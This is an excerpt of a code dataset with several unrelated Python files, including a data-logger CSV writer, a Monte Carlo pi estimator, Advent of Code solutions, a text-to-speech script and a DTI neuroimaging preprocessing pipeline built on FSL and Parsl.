\"\"\"\n This class is used as a temporary save spot for all csv relevant data.\n \"\"\"\n\n def __init__(self, timestamp, name, uid, var_name, raw_data, var_unit):\n \"\"\"\n timestamp -- time data was\n name -- display name of Brick(let)\n uid -- UID of Brick(let)\n var_name -- name of logged value\n raw_data -- logged value\n var_unit -- unit of logged value\n \"\"\"\n self.timestamp = timestamp # datatime object\n self.name = name\n self.uid = uid\n self.var_name = var_name\n self.raw_data = raw_data\n self.var_unit = var_unit\n\n def __str__(self):\n \"\"\"\n Simple Debug function for easier display of the object.\n \"\"\"\n return \"[TIME=\" + str(self.timestamp) + \\\n \";NAME=\" + str(self.name) + \\\n \";UID=\" + str(self.uid) + \\\n \";VAR=\" + str(self.var_name) + \\\n \";RAW=\" + str(self.raw_data) + \\\n \";UNIT=\" + str(self.var_unit) + \"]\"\n\n'''\n/*---------------------------------------------------------------------------\n LoggerTimer\n ---------------------------------------------------------------------------*/\n '''\n\n\nclass LoggerTimer:\n \"\"\"This class provides a timer with a repeat functionality based on a interval\"\"\"\n\n def __init__(self, interval, func_name, var_name, device):\n \"\"\"\n interval -- the repeat interval in seconds\n func -- the function which will be called\n \"\"\"\n if interval < 0:\n interval = 0\n\n self._interval = interval # in seconds\n self._func_name = func_name\n self._var_name = var_name\n self._device = device\n self._enable_ref = None\n self._stop_queue = None\n self._thread = None\n\n def _loop(self, enable_ref, stop_queue):\n monotonic_timestamp = time.monotonic()\n\n while enable_ref[0]:\n elapsed = time.monotonic() - monotonic_timestamp\n remaining = max(self._interval - elapsed, 0)\n\n try:\n stop_queue.get(timeout=remaining)\n except queue.Empty:\n pass\n else:\n break\n\n monotonic_timestamp = time.monotonic()\n\n if not enable_ref[0]:\n break\n\n getattr(self._device, self._func_name)(self._var_name)\n\n def start(self):\n if self._interval == 0:\n return\n\n if self._thread != None:\n return\n\n self._enable_ref = [True]\n self._stop_queue = queue.Queue()\n self._thread = threading.Thread(target=self._loop, args=(self._enable_ref, self._stop_queue), daemon=True)\n self._thread.start()\n\n def stop_and_join(self):\n if self._interval == 0:\n return\n\n if self._thread == None:\n return\n\n self._enable_ref[0] = False\n self._stop_queue.put(None)\n self._thread.join(5)\n\n self._enable_ref = None\n self._stop_queue = None\n self._thread = None\n\n\"\"\"\n/*---------------------------------------------------------------------------\n Utilities\n ---------------------------------------------------------------------------*/\n\"\"\"\n\n\nclass Utilities:\n \"\"\"\n This class provides some utility functions for the data logger project\n \"\"\"\n\n def parse_to_int(string):\n \"\"\"\n Returns an integer out of a string.\n 0(Zero) -- if string is negative or an exception raised during the converting process.\n \"\"\"\n try:\n ret = int(float(string))\n if ret < 0:\n ret = 0\n return ret\n except ValueError:\n # EventLogger.debug(\"DataLogger.parse_to_int(\" + string + \") could not be parsed! Return 0 for the Timer.\")\n return 0\n\n parse_to_int = staticmethod(parse_to_int)\n\n def parse_to_bool(bool_string):\n \"\"\"\n Returns a 'True', if the string is equals to 'true' or 'True'.\n Otherwise it'll return a False\n \"\"\"\n if bool_string == \"true\" or bool_string == \"True\" or bool_string == \"TRUE\":\n return True\n else:\n return False\n\n parse_to_bool = staticmethod(parse_to_bool)\n\n def parse_device_name(device_name):\n tmp = device_name.split(\"[\")\n if len(tmp) == 1:\n return tmp[0], None\n\n device = tmp[0][:len(tmp[0]) - 1]\n uid = tmp[1][:len(tmp[1]) - 1]\n\n return device, uid\n\n parse_device_name = staticmethod(parse_device_name)\n\n def replace_right(source, target, replacement, replacements=None):\n return replacement.join(source.rsplit(target, replacements))\n\n replace_right = staticmethod(replace_right)\n\n def check_file_path_exists(file_path):\n try:\n dir_path = os.path.dirname(file_path)\n if dir_path == \"\" or dir_path is None:\n if file_path == \"\" or file_path is None:\n # no filename - dir\n return False\n else:\n # filename - but no dir\n return True\n elif os.path.isdir(dir_path):\n # dir found\n return True\n return False\n except Exception:\n return False\n\n check_file_path_exists = staticmethod(check_file_path_exists)\n\n def is_valid_string(string_value, min_length=0):\n \"\"\"\n Returns True if 'string_value' is of type str and has at least a size of\n 'min_length'\n \"\"\"\n if not isinstance(string_value, str) or len(string_value) < min_length:\n return False\n return True\n\n is_valid_string = staticmethod(is_valid_string)\n\n\n'''\n/*---------------------------------------------------------------------------\n CSVWriter\n ---------------------------------------------------------------------------*/\n '''\n\n\nclass CSVWriter:\n \"\"\"\n This class provides the actual open/write functions, which are used by the CSVWriterJob class to write logged data into\n a CSV formatted file.\n \"\"\"\n\n def __init__(self, file_path, max_file_count=1, max_file_size=0):\n \"\"\"\n file_path = Path to the csv file\n \"\"\"\n self._file_path = file_path\n # check if file path exists\n if not Utilities.check_file_path_exists(self._file_path):\n raise Exception(\"File Path not found! -> \" + str(self._file_path))\n\n self._raw_file = None\n self._csv_file = None\n\n if max_file_size < 0:\n max_file_size = 0\n self._file_size = max_file_size\n\n # HINT: create always at least 1 backup file!\n if max_file_count < 1:\n max_file_count = 1\n\n self._file_count = max_file_count\n\n self._open_file_A()\n\n def _open_file_A(self):\n \"\"\"Opens a file in append mode.\"\"\"\n\n # newline problem solved + import sys\n if sys.version_info >= (3, 0, 0):\n self._raw_file = open(self._file_path, 'a', newline='', encoding='utf-8') # FIXME append or write?!\n else:\n self._raw_file = open(self._file_path, 'ab', encoding='utf-8')\n\n self._csv_file = csv.writer(self._raw_file, delimiter=\";\", quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n # if the file is empty, create a csv header\n if self._file_is_empty():\n self._write_header()\n\n def _file_is_empty(self):\n \"\"\"\n Simple check if the file is empty.\n Return:\n True - File is empty or missing\n False - File is not empty\n \"\"\"\n try:\n if os.stat(self._file_path).st_size > 0:\n return False\n else:\n return True\n except OSError:\n return True\n\n def _write_header(self):\n \"\"\"Writes a csv header into the file\"\"\"\n if not self._file_is_empty():\n EventLogger.debug(\"File is not empty\")\n return\n\n EventLogger.debug(\"CSVWriter._write_header() - done\")\n self._csv_file.writerow([\"TIME\"] + [\"NAME\"] + [\"UID\"] + [\"VAR\"] + [\"RAW\"] + [\"UNIT\"])\n self._raw_file.flush()\n\n def write_data_row(self, csv_data):\n \"\"\"\n Write a row into the csv file.\n Return:\n True - Row was written into thee file\n False - Row was not written into the File\n \"\"\"\n if self._raw_file is None or self._csv_file is None:\n return False\n\n self._csv_file.writerow([csv_data.timestamp] + [csv_data.name] + [csv_data.uid] + [csv_data.var_name] + [str(csv_data.raw_data)] + [csv_data.var_unit])\n self._raw_file.flush()\n\n if self._file_size > 0:\n self._rolling_file()\n\n return True\n\n def set_file_path(self, new_file_path):\n \"\"\"\n Sets a new file path.\n Return:\n True - File path was updated and successfully opened\n False - File path could not be updated or opened\n \"\"\"\n if not self.close_file():\n return False\n\n self._file_path = new_file_path\n self._open_file_A()\n return True\n\n def reopen_file(self):\n \"\"\"\n Tries to reopen a file, if the file was manually closed.\n Return:\n True - File could be reopened\n False - File could not be reopened\n \"\"\"\n if self._raw_file is not None and self._csv_file is not None:\n return False\n\n self._open_file_A()\n return True\n\n def close_file(self):\n \"\"\"\n Tries to close the current file.\n Return:\n True - File was close\n False - File could not be closed\n \"\"\"\n if self._raw_file is None or self._csv_file is None:\n return False\n try:\n self._raw_file.close()\n self._csv_file = None\n self._raw_file = None\n return True\n\n except ValueError:\n return False\n\n def _rolling_file(self):\n f_size = os.path.getsize(self._file_path)\n if f_size > self._file_size:\n EventLogger.info(\n \"Max Filesize(\" + \"%.3f\" % (self._file_size / 1024.0 / 1024.0) + \" MB) reached! Rolling Files...\")\n self._roll_files()\n\n # FIXME: only files with a . are working!\n def _roll_files(self):\n i = self._file_count\n\n self.close_file()\n\n while True:\n if i == 0:\n # first file reached\n break\n\n tmp_file_name = Utilities.replace_right(self._file_path, \".\", \"(\" + str(i) + \").\", 1)\n\n if os.path.exists(tmp_file_name):\n if i == self._file_count:\n # max file count -> delete\n os.remove(tmp_file_name)\n EventLogger.debug(\"Rolling Files... removed File(\" + str(i) + \")\")\n\n else:\n # copy file and remove old\n copyfile(tmp_file_name, Utilities.replace_right(self._file_path, \".\", \"(\" + str(i + 1) + \").\", 1))\n EventLogger.debug(\"Rolling Files... copied File(\" + str(i) + \") into (\" + str(i + 1) + \")\")\n os.remove(tmp_file_name)\n\n i -= 1\n\n if self._file_count != 0:\n copyfile(self._file_path, Utilities.replace_right(self._file_path, \".\", \"(\" + str(1) + \").\", 1))\n EventLogger.debug(\"Rolling Files... copied original File into File(1)\")\n os.remove(self._file_path)\n self._open_file_A()\n","repo_name":"Tinkerforge/brickv","sub_path":"src/brickv/data_logger/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":14233,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"90"} +{"seq_id":"15052091119","text":"\n# import necessary libraries\nimport math\nimport numpy as np\nimport random\nimport time\n\n\ndef main():\n\n # start the clock\n starttime = time.time()\n \n # set number of random points to check\n npoints = int( 1e9 )\n \n # initialize counter for points in circle \n count = 0\n \n for i in range( npoints ):\n \n # choose random location\n x = random.uniform( -1.0, 1.0 )\n y = random.uniform( -1.0, 1.0 )\n \n # check distance from origin to see if it is within the circle\n d = math.sqrt( x*x + y*y )\n if d < 1:\n count += 1\n \n # calculate the ratio of points that are in the circle to total points\n P = float( count ) / float( npoints )\n \n # estimate pi\n pi = 4.0 * P\n \n # get runtime\n runtime = ( time.time() - starttime )\n \n print( \"pi (estimate) = \", pi )\n print( \"num points = \", npoints )\n print( \"runtime [s] = \", str( round( runtime, 4) ) )\n \n\nif __name__ == '__main__':\n import sys\n sys.exit( main() )\n","repo_name":"ecetter/inthpc425","sub_path":"pi_example/pi_serial.py","file_name":"pi_serial.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"19213954287","text":"from abstract_nested_data import AbstractNestedData\nfrom utility import Utility\n\n\nclass NestedObject(AbstractNestedData):\n\n def __init__(self, utility: Utility):\n super().__init__(utility=utility)\n\n def print_depth(self, data: dict):\n try:\n print('Solution for nested object')\n processed_data: dict = self.utility.convert_data_to_dict(raw_data=data)\n self.utility.print_dict_key_level(dict_data=processed_data)\n except Exception as exception:\n print(exception.args[0])\n finally:\n print('\\n')\n","repo_name":"ShaonDey/python_code_test","sub_path":"nested_object.py","file_name":"nested_object.py","file_ext":"py","file_size_in_byte":581,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"90"} +{"seq_id":"2958101214","text":"from input import input\n\nmostCalories = 0\nsecondMostCalories = 0\nthirdMostCalories = 0\ncurrentCalories = 0\n\ndef rankCalories(calories) -> None:\n global mostCalories\n global secondMostCalories\n global thirdMostCalories\n \n if calories > mostCalories:\n thirdMostCalories = secondMostCalories\n secondMostCalories = mostCalories\n mostCalories = calories\n return\n if calories > secondMostCalories:\n thirdMostCalories = secondMostCalories\n secondMostCalories = calories\n return\n if calories > thirdMostCalories:\n thirdMostCalories = calories\n\n\ninCalculation = False\n\nfor food in input.splitlines():\n if food == '':\n rankCalories(currentCalories)\n currentCalories = 0\n inCalculation = False\n continue\n\n currentCalories += int(food)\n inCalculation = True\n\nif inCalculation:\n rankCalories(currentCalories)\n currentCalories = 0\n inCalculation = False\n\nprint(mostCalories + secondMostCalories + thirdMostCalories)","repo_name":"Amphyros/adventofcode-2022","sub_path":"day1/1-2.py","file_name":"1-2.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"5855594437","text":"f = [l.strip() for l in open(\"day1.txt\")]\n\nQ = []\nfor i in (\"\\n\".join(f)).split(\"\\n\\n\"):\n q = 0\n for j in i.split(\"\\n\"):\n q += int(j)\n Q.append(q)\n\ns = sorted(Q)\nprint(s)\nprint(s[-1] + s[-2] + s[-3])\nprint(max(Q))\n","repo_name":"AntonThoresson/AOC","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"17146533270","text":"import pyttsx3\r\n\r\nengine = pyttsx3.init('sapi5')\r\nvoices = engine.getProperty('voices')\r\nengine.setProperty('voice', voices[1].id) # [1] represents the female voice, if u need male voice type this [0]\r\n\r\ndef speak(audio):\r\n engine.say(audio)\r\n engine.runAndWait()\r\n\r\nspeak(\"hey buddy,have a nice day\") # Type here what do u want to hear at the output window\r\n","repo_name":"hacksmashes/Text-to-speech-conversion-using-python","sub_path":"text to speech.py","file_name":"text to speech.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"22079834480","text":"#!/usr/bin/env python3\nfrom subscripts.utilities import run,is_integer,write,smart_copy\nfrom os.path import join\nfrom parsl.app.app import python_app\nfrom shutil import copyfile\n\n@python_app(executors=['s1'], cache=True)\ndef s1_1_dicom_preproc(params, inputs=[]):\n import time,tarfile\n from subscripts.utilities import run,record_apptime,record_start,smart_remove,smart_copy, \\\n smart_mkdir,write,strip_trailing_slash\n from os.path import join,split,exists,basename\n from shutil import copyfile\n from glob import glob\n import numpy as np\n sdir = params['sdir']\n stdout = params['stdout']\n T1_dicom_dir = params['T1_dicom_dir']\n DTI_dicom_dir = params['DTI_dicom_dir']\n extra_b0_dirs = params['extra_b0_dirs']\n src_nifti_dir = params['src_nifti_dir']\n\n sourcedata_dir = params['sourcedata_dir']\n rawdata_dir = params['rawdata_dir']\n derivatives_dir = params['derivatives_dir']\n bids_dicom_dir = params['bids_dicom_dir']\n bids_nifti_dir = params['bids_nifti_dir']\n subject_name = params['subject_name']\n session_name = params['session_name']\n\n container = params['container']\n DTI_dicom_dir = params['DTI_dicom_dir']\n T1_dicom_dir = params['T1_dicom_dir']\n dicom_tmp_dir = join(sdir, 'tmp_dicom')\n\n smart_remove(dicom_tmp_dir)\n smart_mkdir(dicom_tmp_dir)\n \n smart_mkdir(join(bids_nifti_dir, \"dwi\"))\n smart_mkdir(join(bids_nifti_dir, \"anat\"))\n DTI_dicom_tmp_dir = join(dicom_tmp_dir, 'DTI')\n T1_dicom_tmp_dir = join(dicom_tmp_dir, 'T1')\n extra_b0_tmp_dirs = [join(dicom_tmp_dir, basename(dirname)) for dirname in extra_b0_dirs]\n\n hardi_file = join(bids_nifti_dir, \"dwi\", \"{}_{}_dwi.nii.gz\".format(subject_name, session_name))\n T1_file = join(bids_nifti_dir, \"anat\", \"{}_{}_T1w.nii.gz\".format(subject_name, session_name))\n bvals_file = join(bids_nifti_dir, \"dwi\", \"{}_{}_dwi.bval\".format(subject_name, session_name))\n bvecs_file = join(bids_nifti_dir, \"dwi\", \"{}_{}_dwi.bvec\".format(subject_name, session_name))\n\n start_time = time.time()\n record_start(params)\n\n if src_nifti_dir:\n smart_copy(join(src_nifti_dir, \"hardi.nii.gz\"), hardi_file)\n smart_copy(join(src_nifti_dir, \"anat.nii.gz\"), T1_file)\n smart_copy(join(src_nifti_dir, \"bvals\"), bvals_file)\n smart_copy(join(src_nifti_dir, \"bvecs\"), bvecs_file)\n elif T1_dicom_dir and DTI_dicom_dir:\n smart_remove(DTI_dicom_tmp_dir)\n smart_remove(T1_dicom_tmp_dir)\n\n # copy everything from DICOM dir except old NiFTI outputs\n smart_copy(T1_dicom_dir, T1_dicom_tmp_dir, ['*.nii', '*.nii.gz', '*.bval', '*.bvec'])\n write(stdout, 'Copied {} to {}'.format(T1_dicom_dir, T1_dicom_tmp_dir))\n smart_copy(DTI_dicom_dir, DTI_dicom_tmp_dir, ['*.nii', '*.nii.gz', '*.bval', '*.bvec'])\n write(stdout, 'Copied {} to {}'.format(DTI_dicom_dir, DTI_dicom_tmp_dir))\n for (extra_b0_dir, extra_b0_tmp_dir) in zip(extra_b0_dirs, extra_b0_tmp_dirs):\n smart_remove(extra_b0_tmp_dir)\n smart_copy(extra_b0_dir, extra_b0_tmp_dir, ['*.nii', '*.nii.gz', '*.bval', '*.bvec'])\n write(stdout, 'Copied {} to {}'.format(extra_b0_dir, extra_b0_tmp_dir))\n\n # Run dcm2nii in script to ensure Singularity container finds the right paths\n dicom_sh = join(sdir, \"dicom.sh\")\n smart_remove(dicom_sh)\n\n # Convert DTI dicom to many individual NiFTI files\n dicom_sh_contents = \"dcm2nii -4 N\"\n for file in glob(join(DTI_dicom_tmp_dir, '*.dcm')):\n dicom_sh_contents += \" \" + file\n\n for extra_b0_tmp_dir in extra_b0_tmp_dirs:\n dicom_sh_contents += \"\\ndcm2nii -4 N\"\n for file in glob(join(extra_b0_tmp_dir, '*.dcm')):\n dicom_sh_contents += \" \" + file\n\n dicom_sh_contents += \"\\ndcm2nii -4 N\"\n for file in glob(join(T1_dicom_tmp_dir, '*.dcm')):\n dicom_sh_contents += \" \" + file\n\n if container:\n odir = split(sdir)[0]\n write(dicom_sh, dicom_sh_contents.replace(odir, \"/share\"))\n else:\n write(dicom_sh, dicom_sh_contents)\n write(stdout, 'Running dcm2nii with script {}'.format(dicom_sh))\n run(\"sh \" + dicom_sh, params)\n\n b0_slices = {}\n normal_slices = []\n all_slices = {}\n\n # Check that dcm2nii outputs exist\n found_bvals = glob(join(DTI_dicom_tmp_dir, '*.bval'))\n found_bvecs = glob(join(DTI_dicom_tmp_dir, '*.bvec'))\n found_T1 = glob(join(T1_dicom_tmp_dir, 'co*.nii.gz'))\n\n if len(found_bvals) != 1:\n raise Exception('Did not find exactly one bvals output in {}'.format(DTI_dicom_tmp_dir))\n else:\n copyfile(found_bvals[0], bvals_file)\n\n if len(found_bvecs) != 1:\n raise Exception('Did not find exactly one bvecs output in {}'.format(DTI_dicom_tmp_dir))\n else:\n copyfile(found_bvecs[0], bvecs_file)\n\n # If we don't find the usual T1 file name, just try any NifTI file in the T1 directory\n if len(found_T1) == 0:\n found_T1 = glob(join(T1_dicom_tmp_dir, '*.nii.gz'))\n if len(found_T1) == 0:\n raise Exception('Did not find T1 output in {}'.format(T1_dicom_tmp_dir))\n elif len(found_T1) > 1:\n write(stdout, 'Warning: Found more than one T1 output in {}'.format(T1_dicom_tmp_dir))\n found_T1.sort()\n copyfile(found_T1[0], T1_file)\n\n # Copy extra b0 values to DTI temp dir\n for extra_b0_tmp_dir in extra_b0_tmp_dirs:\n for file in glob(join(extra_b0_tmp_dir, \"*.nii.gz\")):\n copyfile(file, join(DTI_dicom_tmp_dir, \"extra_b0_\" + basename(file)))\n write(stdout, 'Copied NiFTI outputs from {} to {}'.format(extra_b0_tmp_dir, DTI_dicom_tmp_dir))\n\n # Sort slices into DTI and b0\n for file in glob(join(DTI_dicom_tmp_dir, '*.nii.gz')):\n slice_val = run(\"fslmeants -i {} | head -n 1\".format(file), params) # based on getconnectome script\n all_slices[file] = float(slice_val)\n normal_median = np.median(list(all_slices.values()))\n for file in list(all_slices.keys()):\n slice_val = all_slices[file]\n # mark as b0 if more than 20% from normal slice median\n if abs(slice_val - normal_median) > 0.2 * normal_median:\n b0_slices[file] = slice_val\n else:\n normal_slices.append(file)\n if not b0_slices:\n raise Exception('Failed to find b0 values in {}'.format(DTI_dicom_dir))\n write(stdout, 'Found {} normal DTI slices'.format(len(normal_slices)))\n\n # Remove outliers from b0 values\n max_outliers = 1\n if len(b0_slices) > max_outliers:\n num_outliers = 0\n b0_median = np.median(list(b0_slices.values()))\n for file in list(b0_slices.keys()):\n slice_val = b0_slices[file]\n # remove outlier if more than 20% from b0 median\n if abs(slice_val - b0_median) > 0.2 * b0_median:\n b0_slices.pop(file)\n num_outliers += 1\n if num_outliers > max_outliers:\n raise Exception('Found more than {} outliers in b0 values. This probably means that this script has incorrectly identified b0 slices.'.format(max_outliers))\n write(stdout, 'Found {} b0 slices'.format(len(b0_slices)))\n\n # Average b0 slices into a single image\n avg_b0 = join(DTI_dicom_tmp_dir, 'avg_b0.nii.gz')\n smart_remove(avg_b0)\n for file in list(b0_slices.keys()):\n if not exists(avg_b0):\n copyfile(file, avg_b0)\n else:\n run(\"fslmaths {0} -add {1} {1}\".format(file, avg_b0), params)\n run(\"fslmaths {0} -div {1} {0}\".format(avg_b0, len(b0_slices)), params)\n\n # Concatenate average b0 and DTI slices into a single hardi.nii.gz\n normal_slices.sort()\n tmp_hardi = join(dicom_tmp_dir, \"hardi.nii.gz\")\n run(\"fslmerge -t {} {}\".format(tmp_hardi, \" \".join([avg_b0] + normal_slices)), params)\n copyfile(tmp_hardi, hardi_file)\n write(stdout, 'Concatenated b0 and DTI slices into {}'.format(hardi_file))\n\n # Clean extra zeroes from bvals and bvecs files\n num_slices = len(normal_slices)\n with open(bvals_file, 'r+') as f:\n entries = [x.strip() for x in f.read().split() if x]\n extra_zero = entries.pop(0) # strip leading zero\n if extra_zero != \"0\":\n raise Exception(\"{} should begin with zero, as a placeholder for the averaged b0 slice\".format(bvals_file))\n\n # remove zero sequences\n min_sequence_length = 5\n if all(x == \"0\" for x in entries[0:min_sequence_length]):\n write(stdout, \"Stripped leading zero sequence from {}\".format(bvals_file))\n while len(entries) > num_slices:\n extra_zero = entries.pop(0)\n if extra_zero != \"0\":\n raise Exception(\"Failed to clean extra zeros from {}\".format(bvals_file))\n elif all(x == \"0\" for x in entries[-1:-min_sequence_length-1:-1]):\n write(stdout, \"Stripped trailing zero sequence from {}\".format(bvals_file))\n while len(entries) > num_slices:\n extra_zero = entries.pop(-1)\n if extra_zero != \"0\":\n raise Exception(\"Failed to clean extra zeros from {}\".format(bvals_file))\n\n if len(entries) > num_slices:\n raise Exception('Failed to clean bvals file {}. Since {} has {} slices, bvals must have {} columns'.\n format(bvals_file, hardi_file, num_slices, num_slices))\n text = \"0 \" + \" \".join(entries) + \"\\n\" # restore leading zero\n f.seek(0)\n f.write(text)\n f.truncate()\n write(stdout, 'Generated bvals file with values:\\n{}'.format(text))\n with open(bvecs_file, 'r+') as f:\n text = \"\"\n for line in f.readlines():\n if not line:\n continue\n entries = [x.strip() for x in line.split() if x]\n extra_zero = entries.pop(0) # strip leading zero\n if extra_zero != \"0\":\n raise Exception(\"Each line in {} should begin with zero, as a placeholder for the averaged b0 slice\".format(bvecs_file))\n\n # remove zero sequences\n min_sequence_length = 5\n if all(x == \"0\" for x in entries[0:min_sequence_length]):\n write(stdout, \"Stripped leading zero sequence from {}\".format(bvecs_file))\n while len(entries) > num_slices:\n extra_zero = entries.pop(0)\n if extra_zero != \"0\":\n raise Exception(\"Failed to clean extra zeros from {}\".format(bvecs_file))\n elif all(x == \"0\" for x in entries[-1:-min_sequence_length-1:-1]):\n write(stdout, \"Stripped trailing zero sequence from {}\".format(bvecs_file))\n while len(entries) > num_slices:\n extra_zero = entries.pop(-1)\n if extra_zero != \"0\":\n raise Exception(\"Failed to clean extra zeros from {}\".format(bvecs_file))\n\n if len(entries) > num_slices:\n raise Exception('Failed to clean bvecs file {}. Since {} has {} slices, bvecs must have {} columns'.\n format(bvecs_file, hardi_file, num_slices, num_slices))\n text += \"0 \" + \" \".join(entries) + \"\\n\" # restore leading zero\n f.seek(0)\n f.write(text)\n f.truncate()\n write(stdout, 'Generated bvecs file with values:\\n{}'.format(text))\n\n # Compress DICOM inputs\n dicom_tmp_archive = join(bids_dicom_dir, 'sourcedata.tar.gz')\n smart_remove(dicom_tmp_archive)\n with tarfile.open(dicom_tmp_archive, mode='w:gz') as archive:\n archive.add(dicom_tmp_dir, recursive=True, arcname=basename(dicom_tmp_dir))\n smart_remove(dicom_tmp_dir)\n write(stdout, 'Compressed temporary DICOM files to {}'.format(dicom_tmp_archive))\n\n smart_copy(hardi_file, join(sdir, \"hardi.nii.gz\"))\n smart_copy(T1_file, join(sdir,\"T1.nii.gz\"))\n smart_copy(bvecs_file, join(sdir,\"bvecs\"))\n smart_copy(bvals_file, join(sdir,\"bvals\"))\n record_apptime(params, start_time, 1)\n\n### The following three functions parallelize FSL's \"eddy_correct\"\n@python_app(executors=['s1'], cache=True)\ndef s1_2_split_timeslices(params, inputs=[]):\n import time\n from subscripts.utilities import run,record_apptime,smart_remove,smart_copy\n from os.path import join\n from glob import glob\n sdir = params['sdir']\n stdout = params['stdout']\n container = params['container']\n start_time = time.time()\n output_prefix = join(sdir,\"data_eddy\")\n timeslices = glob(\"{}_tmp????.*\".format(output_prefix))\n for i in timeslices:\n smart_remove(i)\n for j in glob(\"{}_ref*\".format(output_prefix)):\n smart_remove(j)\n input_data = join(sdir, \"hardi.nii.gz\")\n output_prefix = join(sdir,\"data_eddy\")\n run(\"fslroi {} {}_ref 0 1\".format(input_data, output_prefix), params)\n run(\"fslsplit {} {}_tmp\".format(input_data, output_prefix), params)\n record_apptime(params, start_time, 2)\n\n@python_app(executors=['s1'], cache=True)\ndef s1_3_timeslice_process(params, worker_id, num_workers, inputs=[]):\n import time\n from subscripts.utilities import run,record_apptime\n from os.path import join,exists\n sdir = params['sdir']\n stdout = params['stdout']\n container = params['container']\n start_time = time.time()\n output_prefix = join(sdir,\"data_eddy\")\n timeslice = worker_id\n slice_data = join(sdir,\"data_eddy_tmp{:04d}.nii.gz\".format(timeslice))\n iteration = 0\n while exists(slice_data):\n # Break loop if it gets stuck\n if iteration > 99:\n break\n run(\"flirt -in {0} -ref {1}_ref -nosearch -interp trilinear -o {0} -paddingsize 1\".format(slice_data, output_prefix), params)\n # Example: worker #3 with 10 total workers will process timeslices 3, 13, 23, 33...\n timeslice += num_workers\n slice_data = join(sdir,\"data_eddy_tmp{:04d}.nii.gz\".format(timeslice))\n iteration += 1\n record_apptime(params, start_time, 3)\n\n@python_app(executors=['s1'], cache=True)\ndef s1_4_dti_fit(params, inputs=[]):\n import time\n from subscripts.utilities import run,smart_remove,record_apptime,record_finish,update_permissions\n from os.path import join,exists\n from shutil import copyfile\n from glob import glob\n sdir = params['sdir']\n stdout = params['stdout']\n container = params['container']\n cores_per_task = params['cores_per_task']\n start_time = time.time()\n output_prefix = join(sdir,\"data_eddy\")\n output_data = join(sdir,\"data_eddy.nii.gz\")\n timeslices = glob(\"{}_tmp????.nii.gz\".format(output_prefix))\n timeslices.sort()\n bet = join(sdir,\"data_bet.nii.gz\")\n bvecs = join(sdir,\"bvecs\")\n bvals = join(sdir,\"bvals\")\n bet_mask = join(sdir,\"data_bet_mask.nii.gz\")\n dti_params = join(sdir,\"DTIparams\")\n dti_L1 = dti_params + \"_L1.nii.gz\"\n dti_L2 = dti_params + \"_L2.nii.gz\"\n dti_L3 = dti_params + \"_L3.nii.gz\"\n dti_MD = dti_params + \"_MD.nii.gz\"\n dti_RD = dti_params + \"_RD.nii.gz\"\n dti_MD = dti_params + \"_MD.nii.gz\"\n dti_AD = dti_params + \"_AD.nii.gz\"\n dti_FA = dti_params + \"_FA.nii.gz\"\n FA = join(sdir,\"FA.nii.gz\")\n run(\"fslmerge -t {} {}\".format(output_data, \" \".join(timeslices)), params)\n run(\"bet {} {} -m -f 0.3\".format(output_data,bet), params)\n run(\"dtifit --verbose -k {} -o {} -m {} -r {} -b {}\".format(output_data,dti_params,bet_mask,bvecs,bvals), params)\n run(\"fslmaths {} -add {} -add {} -div 3 {}\".format(dti_L1,dti_L2,dti_L3,dti_MD), params)\n run(\"fslmaths {} -add {} -div 2 {}\".format(dti_L2,dti_L3,dti_RD), params)\n copyfile(dti_L1,dti_AD)\n copyfile(dti_FA,FA)\n for i in glob(\"{}_tmp????.*\".format(output_prefix)):\n smart_remove(i)\n for j in glob(\"{}_ref*\".format(output_prefix)):\n smart_remove(j)\n update_permissions(params)\n record_apptime(params, start_time, 4)\n record_finish(params)\n\ndef setup_s1(params, inputs):\n stdout = params['stdout']\n container = params['container']\n sdir = params['sdir']\n # input_data = join(sdir, \"hardi.nii.gz\")\n # smart_copy(join(nifti_dir, \"hardi.nii.gz\"), input_data)\n # timeslices = run(\"fslinfo {} | sed -n -e '/^dim4/p'\".format(input_data), params).split()\n # if not timeslices or not is_integer(timeslices[-1]):\n # write(stdout, \"Failed to read timeslices from {}\".format(input_data))\n # return\n # num_timeslices = timeslices[-1]\n num_workers = 32\n s1_1_future = s1_1_dicom_preproc(params, inputs=inputs)\n s1_2_future = s1_2_split_timeslices(params, inputs=[s1_1_future])\n s1_3_futures = []\n for i in range(num_workers):\n s1_3_future = s1_3_timeslice_process(params, i, num_workers, inputs=[s1_2_future])\n s1_3_futures.append(s1_3_future)\n return s1_4_dti_fit(params, inputs=s1_3_futures)\n","repo_name":"markxiao/MaPPeRTrac","sub_path":"subscripts/s1_dti_preproc.py","file_name":"s1_dti_preproc.py","file_ext":"py","file_size_in_byte":17347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"90"} +{"seq_id":"14986888292","text":"import os\nimport numpy as np\n\t\ndef get_pos_dic(pos_file):\n\tpos_dic = {}\n\twith open(pos_file) as f:\n\t\tcont = f.readlines()\n\t\tfor i in range(len(cont)):\n\t\t\tif i%4!=2:\n\t\t\t\tcontinue\n\t\t\tpos_l = cont[i].strip().split(\" \")\n\t\t\tpos_l.pop(-1)\n\t\t\tfor pos in pos_l:\n\t\t\t\tif pos not in pos_dic:\n\t\t\t\t\tpos_dic[pos] = len(pos_dic)+1\n\treturn pos_dic\n\ndef get_word_dic(word_file,vocab_size):\n\tw_dic = {}\n\twith open(word_file) as f:\n\t\tcont = f.readlines()\n\t\tfor i in range(len(cont)):\n\t\t\tif i%4!=1:\n\t\t\t\tcontinue\n\t\t\tw_l = cont[i].strip().split(\" \")\n\t\t\tw_l.pop(-1)\n\t\t\tw_l = \"\".join(w_l).decode(\"utf-8\")\n\t\t\tfor w in w_l:\n\t\t\t\tw = w.encode(\"utf-8\")\n\t\t\t\tif w not in w_dic:\n\t\t\t\t\tw_dic[w] = 0\n\t\t\t\tw_dic[w] += 1\n\tw_list = [[w,count] for w,count in 